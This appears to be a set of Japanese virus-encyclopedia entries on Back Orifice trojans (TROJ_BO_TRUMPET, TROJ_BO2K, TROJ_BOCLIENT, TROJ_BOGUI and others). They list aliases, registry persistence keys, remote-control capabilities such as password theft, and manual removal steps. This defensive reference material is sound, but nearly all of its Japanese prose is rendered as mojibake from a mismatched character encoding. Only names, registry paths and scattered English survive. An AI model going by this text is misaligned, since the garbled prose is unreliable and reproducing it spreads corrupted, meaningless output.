¤òÁõ¤Ã¤¿¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ PlayStation¤Î¥²¡¼¥à¤Î¥¨¥ß¥å¥ì¡¼¥¿¥½¥Õ¥È¤Î¥í¥´¤È¤Þ¤Ã¤¿ ¤¯Æ±¤¸¥¢¥¤¥³¥ó¤ò»ÈÍѤ·¤Æ¤¤¤ë¤¬¡¢¼Â¹Ô¤¹¤ë¤È¡¢¥·¥¹¥Æ¥à ¥Õ¥¡¥¤¥ë¤òºï½ü¤·¡¢¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó¤ò¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤« ¤éµ¯Æ°¤Ç¤­¤Ê¤¤¤è¤¦¤Ë¤¹¤ë¡£ ¼Â¹Ô¤µ¤ì¤ë¤È¡¢¹õ¤¤¥¦¥£¥ó¥É¥¦¤òɽ¼¨¤¹¤ë¡£¤³¤Î¥¦¥£¥ó¥É ¥¦¤Ë¤Ï¥á¥Ë¥å¡¼¤¬¤¢¤ë¤¬¡¢¥¯¥ê¥Ã¥¯¤·¤Æ¤âÈ¿±þ¤Ï¤Ê¤¤¡£¤½ ¤Î¤¿¤á¡¢¥æ¡¼¥¶¡¼¤Ï¡Ö¤³¤Î¥×¥í¥°¥é¥à¤Ï²¿¤â¤·¤Ê¤¤¡¢¤³¤ï ¤ì¤Æ¤¤¤ë¡×¤È¹Í¤¨¤ë¤À¤í¤¦¡£¤·¤«¤·¡¢¤½¤Î´Ö¤Ë¤³¤Î¥È¥í¥¤ ¤ÎÌÚÇϤϡ¢Windows¥·¥¹¥Æ¥à¤Î½ÅÍפʥե¡¥¤¥ë¤Ç¤¢¤ë command.com, win.com. config.sys¤Î£³¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºï ½ü¤·¤Æ¤·¤Þ¤¦¡£¤½¤Î¤¿¤á¡¢¼¡²ó°Ê¹ß¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤«¤é ¤Îµ¯Æ°¤¬ÉÔ²Äǽ¤Ë¤Ê¤ë¡£

TROJ_BO_TRUMPET


̾¡¡¡¡¾Î:TROJ_BO_TRUMPET

ÊÌ¡¡¡¡Ì¾:BUTT TRUMPET PLUG-IN V1.1

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:68KB

ȯ¾ÍÃÏ:USA

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤ÏTROJ_BOSERVER¤Î¥×¥é¥°¥¤¥ó¤È¤·¤Æ³«
ȯ¤µ¤ì¤¿.DLL¥Õ¥¡¥¤¥ë¤Ç¤¢¤ëŽ¡¥È¥í¥¤¤ÎÌÚÇÏ·¿¤Ê¤Î¤Ç¾¤Î¥Õ ¥¡¥¤¥ë¤ä¥Þ¥·¥ó¤Ë´¶À÷¤¹¤ë¤³¤È¤Ï¤Ê¤¤Ž¡ TROJ_BOSERVER¤¬¤¹¤Ç¤Ëưºî¤·¤Æ¤¤¤ë¥Þ¥·¥ó¤Çޤ¤³¤Î¥×¥í¥° ¥é¥à¤ò¼Â¹Ô¤¹¤ë¤Èޤ¤¢¤ë¥á¡¼¥ë¥¢¥É¥ì¥¹¤Ë¥Þ¥·¥ó¤ÎIP¥¢¥É¥ì ¥¹¤ò¥á¡¼¥ë¤ÇÁ÷¿®¤¹¤ëŽ¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¤Þ¤ºŽ¤¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤ò ¥Á¥§¥Ã¥¯¤·¤ÆŽ¤°ÊÁ°¤Ë¥á¡¼¥ë¤¬Á÷¿®¤µ¤ì¤¿¤³¤È¤¬¤¢¤ë¤«¤É¤¦ ¤«¤ò³Îǧ¤¹¤ëŽ¡ HKEY_LOCAL_MACHINE/SOFTWARE/NinjaSoft/BT/RunSuccess for those that care -¡¡¤³¤ÎÃͤ¬¤¢¤ì¤Ð¥×¥í¥°¥é¥à¤Ï½ªÎ»¤¹¤ëŽ¡¤³¤ÎÃͤ¬¤Ê¤±¤ì ¤Ðޤ¤¢¤ëSMTP¥µ¡¼¥Ð¡¼¤ËÀܳ¤·¤Æ¥á¡¼¥ë¤òÁ÷¿®¤¹¤ëŽ¡ -¡¡¤â¤·¤³¤ÎSMTP¥µ¡¼¥Ð¡¼¤ËÀܳ¤Ç¤­¤Ê¤¤¤È¤­¤Ïޤ¥×¥í¥°¥é ¥à¤¬¥¹¥ê¡¼¥×¥â¡¼¥É¤ËÆþ¤êޤ5ʬ¤´¤È¤ËºÆÀܳ¤ò»î¤ß¤ëŽ¡¤³¤ì ¤Ïޤ¥Þ¥·¥ó¤¬¥·¥ã¥Ã¥È¥À¥¦¥ó¤µ¤ì¤ë¤Ê¤É¤·¤Æ¥×¥í¥°¥é¥à¤¬½ª 뤵¤ì¤ë¤«Ž¤¤Þ¤¿¤ÏÀܳ¤ËÀ®¸ù¤¹¤ë¤Þ¤Ç·«¤êÊÖ¤µ¤ì¤ëŽ¡ -¡¡Àܳ¤ËÀ®¸ù¤·¤Æ¥á¡¼¥ë¤òÁ÷¿®¤·¤¿¤¢¤Èޤ¾åµ­¤Î¥ì¥¸¥¹¥È ¥ê¤ËÃͤò½ñ¤­¹þ¤àŽ¡¤³¤ì¤Ë¤è¤Ã¤ÆÆó½Å¤Ë¥á¡¼¥ë¤¬Á÷¤é¤ì¤ë¤³ ¤È¤òËɻߤ·¤Æ¤¤¤ëŽ¡
È÷¡¡¡¡¹Í:TORJ_BO_TRUMPET¤Î¥½¡¼¥¹¥³¡¼¥É¤Ï¸ø³«¤µ¤ì¤Æ¤¤
¤ë¤¿¤áޤ¤¤¤¯¤Ä¤«¤Î°¡¼ï¤¬Â¸ºß¤¹¤ëŽ¡¤³¤ì¤é¤Ï¤¤¤º¤ì¤âTROJ_ BOSERVER¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤Ê¤± ¤ì¤Ðµ¡Ç½¤·¤Ê¤¤Ž¡ ¼êưºï½ü¼ê½ç ¤Þ¤ºŽ¤TROJ_BOSERVER¤òºï½ü¤¹¤ëŽ¡
¢£ÂнèÊýË¡:
­¡¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤òºï½ü¤¹¤ë¡£ \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices ¤ËTROJ_BOSERVER/CLIENT¤Î¥Õ¥¡¥¤¥ë¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Çޤ ¤½¤Î¥­¡¼¤òºï½ü¤·¤Þ¤¹Ž¡ ­¢¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë¡£ ­£TROJ_BOSERVER/CLIENT¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¡£ ­¤TORJ_BO_TRUMPET¤Î¥×¥í¥°¥é¥à¤òºï½ü¤¹¤ëŽ¡

TROJ_BO2


̾¡¡¡¡¾Î:TROJ_BO2

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows 32bit

¥¦¥¤¥ë¥¹¥µ¥¤¥º:443 Kb

¾Ü¡¡¡¡ºÙ:NetBus¥¦¥¤¥ë¥¹¤äBackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢
¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¢¤ë¡£ ¤³¤Î¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ìޤ¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤ËÀܳ¤µ¤ì¤¿¥³ ¥ó¥Ô¥å¡¼¥¿¤Ø¤Î´¶À÷¤ËÀ®¸ù¤·¤¿¾ì¹ç¡¢¥Ï¥Ã¥«¡¼¤ÏIP¥¢¥É¥ì ¥¹¤òÆþ¼ê¤·¡¢¤½¤Î¥³¥ó¥Ô¥å¡¼¥¿¤ò¤µ¤Þ¤¶¤Þ¤ËÁàºî¤¹¤ë¤³¤È ¤¬¤Ç¤­¤ë¡£Î㤨¤Ð¡¢¥Õ¥¡¥¤¥ë¤ò°Üư¤µ¤»¤¿¤ê¾Ãµî¤·¤¿¤ê¡¢ ¥¦¥£¥ó¥É¥¥¥º¡¦¥·¥¹¥Æ¥à¤òÍѤ¤¤¿¥³¥ó¥Ô¥å¡¼¥¿¤ÎÀßÄê¤ò¹Ô ¤Ê¤Ã¤¿¤ê¤¹¤ë¤³¤È¤¬²Äǽ¤È¤Ê¤ë¡£ ¤Þ¤¿Ž¤¤³¤Î¥Ï¥Ã¥«¡¼¥Ä¡¼¥ë¤Ïޤ±Ñ¸ì¤«¥¹¥Ú¥¤¥ó¸ì¤Ç½ñ¤«¤ì¤¿ ¥¹¥¯¥ê¥×¥È¤ÇÁàºî¤¹¤ë¤³¤È¤â¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤Ã¤Æ¤¤¤ëŽ¡

TROJ_BO2K


̾¡¡¡¡¾Î:TROJ_BO2K

ÊÌ¡¡¡¡Ì¾:BackOrifice2K.Trojan, BO2K Backdoor, BO
2000, Back Orifice 2000
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows 95/98/NT

ȯ¾ÍÃÏ:USA

ȯ¸«Æü:7/10, 1999

¾Ü¡¡¡¡ºÙ:¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ÏGUI¤ò¤â¤Ä¥³¥ó¥½¡¼¥ë
¤È¤Ê¤Ã¤Æ¤ª¤ê¡¢¤³¤ì¤òÍøÍѤ·¤Æ¹¶·â¼Ô¤Ï»×¤¤¤É¤ª¤ê¤Ë¥³¥ó ¥Ô¥å¡¼¥¿¤òÁàºî¤Ç¤­¤ë¡£Îã¤È¤·¤Æ¡¢¥Õ¥¡¥¤¥ë¡¢¥ì¥¸¥¹¥È ¥ê¡¢±ÇÁü¡¢¥­¡¼¥Ü¡¼¥É¥·¥¹¥Æ¥à¤Î´°Á´¤ÊÀ©¸æ¤ä¡¢¥Ç¥¹¥¯¥È ¥Ã¥×¡¢¥â¥Ë¥¿¡¼¡¢¥¹¥Ô¡¼¥«¡¼¡¢CD-ROM¡¢¥¹¥¿¡¼¥È¥Ü¥¿¥ó¡¢ ¥Ç¥¹¥¯¥È¥Ã¥×¤Î¥¢¥¤¥³¥ó¡¢µ¯Æ°Ãæ¤Î¥×¥í¥»¥¹¡¢³«¤«¤ì¤Æ¤¤ ¤ë¥¦¥¤¥ó¥É¥¦¤Ê¤É¤ò²þ¤¶¤ó¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£ º£²ó¸ø³«¤µ¤ì¤¿¡ÖTROJ_BO2K¡×¤Ï¡¢Á°¥Ð¡¼¥¸¥ç¥ó¤Îµ¡Ç½¤Ë²Ã ¤¨¡¢°Ê²¼¤Îµ¡Ç½¤¬¶¯²½¤µ¤ì¤Æ¤¤¤ëŽ¡ *Windows NT (Server/Workstation)¥µ¥Ý¡¼¥È *¥×¥é¥°¥¤¥óµ¡Ç½¤Î¥µ¥Ý¡¼¥È¡ÊÂè»°¼Ô¤¬ºîÀ®¤·¤¿¥×¥é¥°¥¤¥ó ¤òÁȤ߹þ¤à¤³¤È¤¬²Äǽ¡Ë *°Å¹æ²½µ¡Ç½¤Î¶¯²½ *GNU General Public License¡ÊFree Software Foundation ¼Ò¤¬·Ç¤²¤ëÍýǰ¤Ë´ð¤Å¤¤¤ÆÌÀʸ²½¤µ¤ì¤¿¥½¥Õ¥È¥¦¥§¥¢¥é¥¤ ¥»¥ó¥¹µ¬Ìó¡Ë¤Ë´ð¤Å¤¯¥½¡¼¥¹¥³¡¼¥É¤Î¸ø³«¡£ *UDP(User Datagram Protocol)¤Ë¤è¤ë¥Ç¡¼¥¿Å¾Á÷¤Î¥µ¥Ý ¡¼¥È *¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤«¤é¥ì¥¸¥¹¥È¥ê¤ÎÄɲÃ/ºï½ü¡¢¥Í ¥Ã¥È¥ï¡¼¥¯¶¦Í­¥É¥é¥¤¥Ö¤ÎÄɲÃ/ºï½ü¡¢Windows NT¥×¥í¥»¥¹ ¤ÎÄɲÃ/ºï½ü¤¬²Äǽ¤Ë
¾ÜºÙ:
- ¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢..\Windows\System ¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤Ë¼«Ê¬¼«¿È¤ÎÊ£À½¤Ç¤¢¤ë¡ÈUMGR32.EXE¡É ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ëŽ¡ - ¤³¤Î¤È¤­Ž¤¥Þ¥·¥óµ¯Æ°»þ¤ËËè²ó¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è ¤¦¤Ë¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¤Ø¡ÈUMGR32.EXE¡É¤È¤¤¤¦¥­¡¼¤òÅÐ Ï¿¤·¡¢¥Þ¥·¥ó¤òµ¯Æ°¤¹¤ëÅ٤ˎ¤ ¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ëŽ¡ *Windows95/98 \\HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT \WINDOWS\CURRENT VERSION\RUNSERVICES *WindowsNT \\HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENT VERSION\RUN - ¼Â¹ÔÃæ¤Ë¥Õ¥¡¥¤¥ë¤Îºï½ü¤Ï¤Ç¤­¤Ê¤¤Ž¡ - TROJ_BO2K¤Ï¡¢¥¹¥Æ¥ë¥¹µ¡Ç½¤ò»ý¤Ã¤Æ¤ª¤ê¡¢¥¿¥¹¥¯¤¬¼Â¹Ô Ãæ¤Ç¤âWindows¤Î¥¿¥¹¥¯¥Þ¥Í¡¼¥¸¥ã¡¼Åù¤Ç¤½¤Î¥×¥í¥»¥¹¤ò³Î ǧ¤¹¤ë¤³¤È¤¬¤Ç¤­¤Ê¤¤¤è¤¦¤ËÀßÄꤹ¤ë¤³¤È¤¬¤Ç¤­¤ë¡£
¾É¾õ:
Windows95/98¤Ï¡¢..\Windows\system\¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ ¤Ë¡¢WindowsNT¤Ç¤Ï..\\WinNT\System32\¥Ç¥£¥ì¥¯¥È¥ê¤Î¤Ê ¤«¤Ë¡¢¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤ÎÊ£À½¥Õ¥¡¥¤¥ë¡ÉUMGR32.EXE¡É ¤¬ºîÀ®¤µ¤ì¤ëŽ¡
¡ÊÃí:¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤Î¥Õ¥¡¥¤¥ë̾¤È¥×¥í¥»¥¹Ì¾¤ò¼«
ͳ¤ËÊѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£¥³¥Þ¥ó¥ÉÆâ¤Î ¡ÈUMGR32.EXE ¡ÉÉôʬ¤Ïɬ¤º¤·¤â¤³¤Î̾¾Î¤Ç¤¢¤ë¤È¤Ï¸Â¤é¤Ê¤¤¤³¤È¤Ë¤´Ãí °Õ¤¯¤À¤µ¤¤¡£¡Ë
È÷¡¡¡¡¹Í:¢£ÂнèÊýË¡:
1.¥ì¥¸¥¹¥È¥ê¤Î¥­¡¼¤òºï½ü¤¹¤ë¡£ *Windows 95/98 – \\HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENT VERSION\RUNSERVICES\UMGR32.EXE *Windows NT – \\HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\ CURRENT VERSION\RUN\UMGR32.EXE 2.¥Þ¥·¥ó¤òºÆµ¯Æ°¤¹¤ë¡£ 3.TROJ_BO2£Ë¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤òºï½ü¤¹¤ë¡£

TROJ_BO2K.DROP


̾¡¡¡¡¾Î:TROJ_BO2K.DROP

ÊÌ¡¡¡¡Ì¾:BACKORIFICE2K.INST3, BO2K.INST

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1.24-1.26MB

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏTROJ_BO2K¤ò»ÈÍѤ·¤è¤¦¤È¤¹¤ë¿Í¤Î°Ù¤Î¥¤
¥ó¥¹¥È¡¼¥ë¥­¥Ã¥È¤Ç¤¢¤ë¡£¤³¤Î¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë ¤¹¤ë¤È¡¢¹¥¤ß¤Ë¹ç¤ï¤»¤Æ¥«¥¹¥¿¥Þ¥¤¥º¤·¤¿TROJ_BO2K¤Î¥µ ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤òºîÀ®¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£¤Þ¤¿¡¢¥µ¡¼¥Ð ¡¼¥â¥¸¥å¡¼¥ë¤òÁàºî¤¹¤ë¤¿¤á¤Î¥¯¥é¥¤¥¢¥ó¥È¥â¥¸¥å¡¼¥ë¤â ´Þ¤Þ¤ì¤Æ¤¤¤ë¡£ ¤³¤Î¥¤¥ó¥¹¥È¡¼¥ë¥­¥Ã¥È¤Ë¤ÏUSAÈǤÈInternationalÈÇ¤ÎÆó ¤Ä¤¬¤¢¤ë¡£¤½¤ì¤¾¤ì¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾¤Ï°Ê²¼¤ÎÄ̤ꡣ bo2k_1_0_intl.exe (1.24MB) bo2k_1_0_US.exe (1.26MB) ¤Á¤Ê¤ß¤ËTROJ_BO2KÀ©ºîȯɽ»þ¤Ë¸ø³«¤µ¤ì¤¿bo2k_1_0_intl. exe¤Ï¡¢PE_CIH¤Ë´¶À÷¤·¤Æ¤¤¤¿¤³¤È¤Ç¤âͭ̾¤Ç¤¢¤ë¡£

TROJ_BO2K.PLUG


̾¡¡¡¡¾Î:TROJ_BO2K.PLUG

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:77824bytes

ȯ¸«Æü:8/3/99

¾Ü¡¡¡¡ºÙ:TROJ_BO2K.PLUG¤Ï¡¢¥Í¥Ã¥È¥ï¡¼¥¯·Ðͳ¤Ç¥Ï¥Ã¥­
¥ó¥°¤ò¹Ô¤Ê¤¦¤¿¤á¤Î¥Ä¡¼¥ëTROJ_BO2K (Back Orifice2000) ¤Î¥×¥é¥°¥¤¥ó¤Ç¤¢¤ë¡£ ¡ÖBack Orifice¡×¤È¤Ï¥¯¥é¥¤¥¢¥ó¥È ¡¦¥µ¡¼¥Ð·¿¥×¥í¥°¥é¥à¤È¤Ê¤Ã¤Æ¤ª¤ê¡¢¥µ¡¼¥ÐŽ¥¥â¥¸¥å¡¼¥ë¤¬ ¼Â¹Ô¤µ¤ì¤¿¥Þ¥·¥ó¤ò¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò¤â¤Ä¹¶·â ¼Ô¤¬¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç±ó³ÖÀ©¸æ¤¹¤ë¤³¤È¤òÌÜŪ¤ËºîÀ® ¤µ¤ì¤¿¥×¥í¥°¥é¥à¤Ç¡¢¥Ï¥Ã¥­¥ó¥°¡¦¥Ä¡¼¥ë¤È¤·¤Æ¹­¤¯ÃÎ¤é ¤ì¤Æ¤¤¤ë¡£ ¤³¤Î¥×¥é¥°¥¤¥ó¤òTROJ_BO2K¤Î¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Ë»Å¹þ¤à ¤È¡¢¥¯¥é¥¤¥¢¥ó¥È¥Ä¡¼¥ë¤«¤é±ó³ÖÁàºî¤Ç¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥ó ¤Ë¥¢¥¯¥»¥¹¤·¤¿ºÝ¡¢¥æ¡¼¥¶¡¼¤Î¥Þ¥·¥óÆâ¤ÎÁ´¥Õ¥¡¥¤¥ë¤ò ¡Ö¥¨¥¯¥¹¥×¥í¡¼¥é¡×É÷¤Ëɽ¼¨¤µ¤»¤ë¤³¤È¤¬²Äǽ¤Ë¤Ê¤ë¡£¤â ¤Á¤í¤ó¡¢¥Õ¥¡¥¤¥ë¤ä¥Ç¥£¥ì¥¯¥È¥ê¤ÎºîÀ®¤äºï½üÅù¤ÎÁàºî¤â ²Äǽ¤Ç¤¢¤ë¡£ ¤Þ¤¿¡¢Æ±Íͤˡ֥쥸¥¹¥È¥ê¥¨¥Ç¥£¥¿¡×É÷¤Ë¥æ¡¼¥¶¡¼¥Þ¥·¥ó ¤Î¥ì¥¸¥¹¥È¥ê¤ÎÁ´ÆâÍÆ¤òɽ¼¨¤·¡¢¤³¤ì¤ò¥¯¥é¥¤¥¢¥ó¥È¥â¥¸ ¥å¡¼¥ë¤«¤é¹¥¤­¾¡¼ê¤ËÁàºî¤µ¤»¤ë¤³¤È¤ò²Äǽ¤Ë¤·¤Æ¤·¤Þ ¤¦¡£
È÷¡¡¡¡¹Í:TROJ_BO2K¤Ï¡¢¥×¥é¥°¥¤¥óµ¡Ç½¤ò¥µ¥Ý¡¼¥È¤·¤Æ¤ª
¤ê¡¢¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤òºîÀ®¤¹¤ë¤È¤­¤Ë¤µ¤Þ¤¶¤Þ¤Ê¥×¥é ¥°¥¤¥ó¤ò»Å¹þ¤à¤³¤È¤¬¤Ç¤­¤ë¡£¤³¤ÎTROJ_BO2K.PLUG¤â¤½¤Î °ì¤Ä¤Ç¤¢¤êBOTOOL¤È¤¤¤¦Ì¾¾Î¤Ç¸ø³«¤µ¤ì¤¿¡£

TROJ_BOCLIENT


̾¡¡¡¡¾Î:TROJ_BOCLIENT

ÊÌ¡¡¡¡Ì¾:BACKORIFICE.TROJAN, BOCLIENT_TROJAN, TROJ_
BOSERVER
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¾Ü¡¡¡¡ºÙ:Windows95/98¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë
¥¹¡£¥¯¥é¥¤¥¢¥ó¥È/¥µ¡¼¥Ð¡¼·¿±ó³ÖÀ©¸æ¥Ä¡¼¥ë¤Ç¡¢¥µ¡¼¥Ð ¡¼Ž¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_BOSERVER¡Ë¤È¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å ¡¼¥ë¡ÊTROJ_BOCLIENT¡Ë¡¢£²¤Ä¤Î¥×¥í¥°¥é¥à¤«¤é¤Ê¤ë¡£ ¡ÝTROJ_BOCLIENT¤Ï¡¢TROJ_BOSERVER¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿¥Þ ¥·¥ó¤òÀ©¸æ¤¹¤ë¤¿¤á¤Î¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£ -¡¡TROJ_BOSERVER¥×¥í¥°¥é¥à¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë¥Þ ¥·¥ó¤ËÂФ·¤Æ¡¢TROJ_BOCLIENT¤ò»È¤Ã¤Æ¥ê¥â¡¼¥È¤Ç¥Õ¥ë¥¢¥¯ ¥»¥¹¤·¡¢¡Ö¥Õ¥¡¥¤¥ë¤Ë¥¢¥¯¥»¥¹¤¹¤ë¡×¡Ö¥Ñ¥¹¥ï¡¼¥É¤òÅð ¤à¡×¡Ö¥Þ¥·¥ó¤ò¥·¥ã¥Ã¥È¥À¥¦¥ó¤¹¤ë¡×¤È¤¤¤Ã¤¿Áàºî¤ò¹Ô¤¦ ¤³¤È¤¬¤Ç¤­¤ë¡£
È÷¡¡¡¡¹Í:¤³¤ì¤Ï¥Ï¥Ã¥«¡¼¤Î¤¿¤á¤Î¥Ä¡¼¥ë¤Ç¤¢¤ë¡£¤³¤Î¥Õ
¥¡¥¤¥ë¼«¿È¤¬Â»³²¤òµÚ¤Ü¤¹¤³¤È¤Ï¤Ê¤¤¡£

TROJ_BOGUI


̾¡¡¡¡¾Î:TROJ_BOGUI

ÊÌ¡¡¡¡Ì¾:Orifice.cli.b, BackOrifice.Trojan,
Backdoor.BO.c, Troj/BO-Client
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Win9x/NT

¾Ü¡¡¡¡ºÙ:
¡¡¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤ÆÂ¾¤Î¥Þ¥·¥ó¤ò¥ê¥â¡¼¥È¥³¥ó¥È¥í ¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Î ¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ç¤¹¡£¤³¤Î¥×¥í¥°¥é¥à¤ò»È¤Ã¤Æ¥µ ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯Æ°Ãæ¤Î¾¤Î¥Þ¥·¥ó¤ò¥ê¥â¡¼¥È¥³¥ó¥È ¥í¡¼¥ë¤Ç¤­¤Þ¤¹¡£Â¾¤Î¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤è¤êGUI¤òÍøÍѤ·¤¿ ¿µ¡Ç½¤Ê¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ç¤¹¡£ ¡¡¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤ÈɽÌ̾岿¤âµ¯¤³¤é¤Ê¤«¤Ã¤¿¤è ¤¦¤Ë¸«¤¨¤Þ¤¹¤¬¡¢Î¢¤Ç¼«Ê¬¼«¿È¤ò¥·¥¹¥Æ¥à¤Ë¥¤¥ó¥¹¥È¡¼¥ë ¤·¡¢ÀßÄê¤ò¥Õ¥¡¥¤¥ë¤Ëµ­Ï¿¤·¤Þ¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬ µ¯Æ°Ãæ¤Î¾¤Î¥Þ¥·¥ó¤ËÂФ·¡¢°Ê²¼¤ÎÁàºî¤¬¹Ô¤¨¤Þ¤¹¡£ ¡¦¥³¥ó¥Ô¥å¡¼¥¿¡¼Ì¾¡¢¥æ¡¼¥¶¡¼Ì¾¤Î¼èÆÀ¤È½ñ¤­´¹¤¨ ¡¦¥·¥¹¥Æ¥à¾ðÊó¡ÊCPU¥¿¥¤¥×¡¢¥á¥â¥ê¥µ¥¤¥º¡¢OS¥Ð¡¼¥¸¥ç ¥ó¡¢Àܳ¥É¥é¥¤¥Ö¤È¤½¤Î¶õ¤­ÍÆÎ̡ˤμèÆÀ¤È½ñ¤­´¹¤¨ ¡¦¶¦Í­¥É¥é¥¤¥Ö¤ÎÀßÄêÊѹ¹ ¡¦¥Ç¥£¥¹¥¯ÆâÍÆ¤Î±ÜÍ÷¤È¥Õ¥¡¥¤¥ë¸¡º÷ ¡¦¥Õ¥¡¥¤¥ë¤ÎÁ÷¼õ¿® ¡¦ºï½ü¡¢¥³¥Ô¡¼¡¢¥ê¥Í¡¼¥à¡¢¼Â¹Ô¤Ê¤É¤Î¥Õ¥¡¥¤¥ëÁàºî ¡¦¥Ç¥¤¥ì¥¯¥È¥ê¤ÎºîÀ®/ºï½ü ¡¦¥Õ¥¡¥¤¥ë¤Î°µ½Ì/²òÅà ¡¦¥«¥ì¥ó¥È¥æ¡¼¥¶¡¼¤Î¥í¥°¥ª¥Õ ¡¦¥³¥ó¥Ô¥å¡¼¥¿¡¼¤ÎÄä»ß ¡¦¼Â¹ÔÃæ¥×¥í¥»¥¹¾ðÊó¤Î¼èÆÀ/Êѹ¹ ¡¦¼Â¹ÔÃæ¥×¥í¥»¥¹¤Î¶¯À©½ªÎ» ¡¦¥Í¥Ã¥È¥ï¡¼¥¯¥ê¥½¡¼¥¹¾ðÊó¤Î¼èÆÀ¤ÈÀܳ ¡¦¥Þ¥·¥óµ¯Æ°°ÊÍè»ÈÍѤ·¤¿¥Ñ¥¹¥ï¡¼¥É¾ðÊó¤Î¼èÆÀ ¡¦¥¹¥¯¥ê¡¼¥ó¥»¡¼¥Ð¡¼¥Ñ¥¹¥ï¡¼¥É¤Î¼èÆÀ ¡¦¥á¥Ã¥»¡¼¥¸¥Ü¥Ã¥¯¥¹É½¼¨ ¡¦¥ì¥¸¥¹¥È¥ê¤Î»²¾È ¡¦TCP/IPÀܳ¤Î¥ª¡¼¥×¥ó/¥ê¥À¥¤¥ì¥¯¥È 